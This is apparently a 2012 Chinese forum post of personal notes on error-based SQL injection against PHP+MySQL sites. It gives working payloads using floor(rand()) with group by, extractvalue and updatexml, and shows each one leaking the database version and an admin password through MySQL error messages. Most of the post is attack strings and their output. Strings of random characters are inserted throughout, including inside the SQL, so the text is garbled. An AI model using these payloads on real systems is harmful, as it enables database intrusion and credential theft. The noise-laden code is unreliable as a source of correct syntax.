放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。 I3 z1 z& [ m" R
实际测试环境:5 k z: E9 g, P3 D
4 \" T# u0 E3 t
/ A" ]( ?$ E; Imysql> show tables;
( Q1 i# k0 w8 k$ E; i' W) ^+----------------+
" @! J2 \: b. H| Tables_in_test |3 F: L8 Q; U- b6 \ A
+----------------+( D9 i: }2 ]/ G: M% b' |7 W! v
| admin |6 i% B! r! T. W! G: J G
| article |, M' D2 P0 H% ]$ K5 [
+----------------+
2 z/ H# o0 F" q% x( ~! L
5 V0 d* y& d, s0 I
+ x; x* N% D1 a5 Z! Z! b
6 b( ?9 _$ G) R$ s. b Dmysql> describe admin;) g" p. R, n4 u! _+ B5 t- p
+-------+------------------+------+-----+---------+----------------+" c9 D" n; b% \, x: m; a- w6 O
| Field | Type | Null | Key | Default | Extra |
6 f/ i- a$ p% ?7 k3 Q+-------+------------------+------+-----+---------+----------------+
1 N8 Q' O0 `* F: |7 E& \8 f1 O| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
! T5 i: c9 ]. {3 }& z, o# R| user | varchar(50) | NO | | NULL | |
2 d! z% S$ S& G| pass | varchar(50) | NO | | NULL | |
* I2 Y1 }' x5 R& L+-------+------------------+------+-----+---------+----------------+/ A* X6 n2 L$ N3 w0 e
- n4 x/ l0 q% E, \6 @" h% @% h
4 c7 X$ r* ^" A, _' H; r
! p8 s; M+ K3 k8 _mysql> describe article;
4 Y7 ?1 |% N* F/ J# A+---------+------------------+------+-----+---------+----------------+' c/ w" x% K7 y* c( P3 l2 A; R0 E
| Field | Type | Null | Key | Default | Extra |7 o# M* A V7 c/ |" g- G
+---------+------------------+------+-----+---------+----------------+
. v/ P3 Q8 z6 j% m" d5 B1 _4 }| id | int(10) unsigned | NO | PRI | NULL | auto_increment |* g1 u+ L2 n+ j6 B# g
| title | varchar(50) | NO | | NULL | |
! L, E2 X3 W2 v3 o% p3 i0 n| content | varchar(50) | NO | | NULL | |2 V4 i/ U1 _- k5 [1 j7 l* ?
+---------+------------------+------+-----+---------+----------------+
; ^5 N6 M+ g, F) |8 R6 W @6 e1、通过floor报错; I5 f- b% C. K3 ?3 b8 [
可以通过如下一些利用代码$ h4 I7 |/ |5 Q7 K6 Q
8 L: C3 z* P; ^% L
$ D/ V% \' |9 l: c/ F c0 Mand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x3 j* [; `2 q0 J7 A
from information_schema.tables group by x)a);
B+ h$ q" W) g2 c1 t9 w7 s, T
' G) C: Z s2 p* t) H. @8 X * ]1 C- q/ {- I8 S" R
and (select count(*) from (select 1 union select null union select !1)x/ A) c# Y, J4 t
group by concat((select table_name from information_schema.tables limit 1),) Y3 k) {2 X, E; c- r2 {. o
floor(rand(0)*2))); J( g- J& r* a. T9 I/ L
举例如下:3 e S" t1 Q, F5 |- [- }
首先进行正常查询:
8 K& k7 F; b0 @ v6 h ; T/ w; a: ?% k7 ^( s/ k
mysql> select * from article where id = 1;9 \+ j( `3 G( x2 q D
+----+-------+---------++ q/ c: H$ T b$ m a* e
| id | title | content |2 C/ B M9 l$ F b
+----+-------+---------+
0 ^7 G$ S# t# N7 V| 1 | test | do it |' p1 K6 {1 w2 F: L& D
+----+-------+---------+
0 V( R* I) f* X! _7 |假如id输入存在注入的话,可以通过如下语句进行报错。
$ h, R' d6 M; L% R. {. k 7 M7 p' }/ O1 q. J$ [
9 c% m# Y' z" w H" Jmysql> select * from article where id = 1 and (select 1 from8 r, ]8 W" H3 `6 {, m
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);0 l! V" k6 {, S2 G6 x1 l
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
- o1 n. g: k: p7 v: Z可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
4 i5 G2 h' V1 c" \( v# {( Z例如我们需要查询管理员用户名和密码:
8 p/ @$ x' m9 L7 j& A0 B* A7 F' jMethod1:
1 Q0 S3 n( W: \2 K. O1 v5 {
3 ]+ @/ t( k6 S% W0 ?8 g
( I r( G4 E/ Bmysql> select * from article where id = 1 and (select 1 from
: r! }) \1 C5 B6 l# |, w7 m(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
' P# L4 S- B7 ]/ J! H& Q4 X6 Qfrom information_schema.tables group by x)a);
( l% [/ f( `* O; d5 H! K/ y0 c6 eERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
) j5 P) B# W0 n% }+ F5 }Method2:
6 {' p% c5 P) n7 `) a
& r2 c6 W3 F* N: k( y: \) ^" U $ ]2 ^3 p: K, d3 c0 g+ p
mysql> select * from article where id = 1 and (select count(*)# m+ u' E' k2 U4 i4 l
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),/ _0 l. c9 g/ J3 T" F4 x$ }7 F6 I e
floor(rand(0)*2)));
; |) w$ I- E6 V7 O! SERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'$ k9 C) J/ ?" R9 Y9 q- A! Q1 _
2、ExtractValue& W! v7 }8 s, D# ]# V1 d7 ~
测试语句如下
4 ]4 E5 r# C* q8 i* H( B
/ R# `- Y' C* ^6 E7 J, {
1 U0 s7 W, c8 \! eand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
9 G( o$ z# i1 W" ?" g: L7 ?实际测试过程0 ^4 e1 S- v2 p- S$ M4 k" o
$ V# b7 x7 F. M5 V+ E5 J
! j4 z4 V: n S% B+ Imysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,( x8 R0 s: ?0 Q: U
(select pass from admin limit 1)));--# p5 a& i3 r F# {" _" D, k
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
" [1 ~! U8 c* H3、UpdateXml) b' Q. A3 X) ?- U( r( Y
测试语句
# O4 Y. y& q! c& {
3 R2 L/ |" Y8 D9 l( q # {: N1 b5 D+ z6 W; p5 X& o
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
% m9 I; `1 I6 u! L( U. m1 A实际测试过程
8 R- ]0 O$ b0 W7 L/ R) ^ _# W& F
% K, T6 k, B0 a% X* I& {2 |4 X) D
1 g1 V' _: |$ k* Y- o; o/ x7 \3 g5 S" umysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
0 E9 M! r- Z% a3 P% l, r0 h(select pass from admin limit 1),0x5e24),1));, t9 m3 X% u& @/ u
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
7 ^+ ~6 R, s0 [+ E8 XAll, thanks foreign guys.
& s4 U1 q. G( X4 t+ g7 P E " V8 ]; c* Y) \
1 }* ]2 {) C0 ~' [, h d |
发表于 2012-12-10 10:28:51
收藏
支持
反对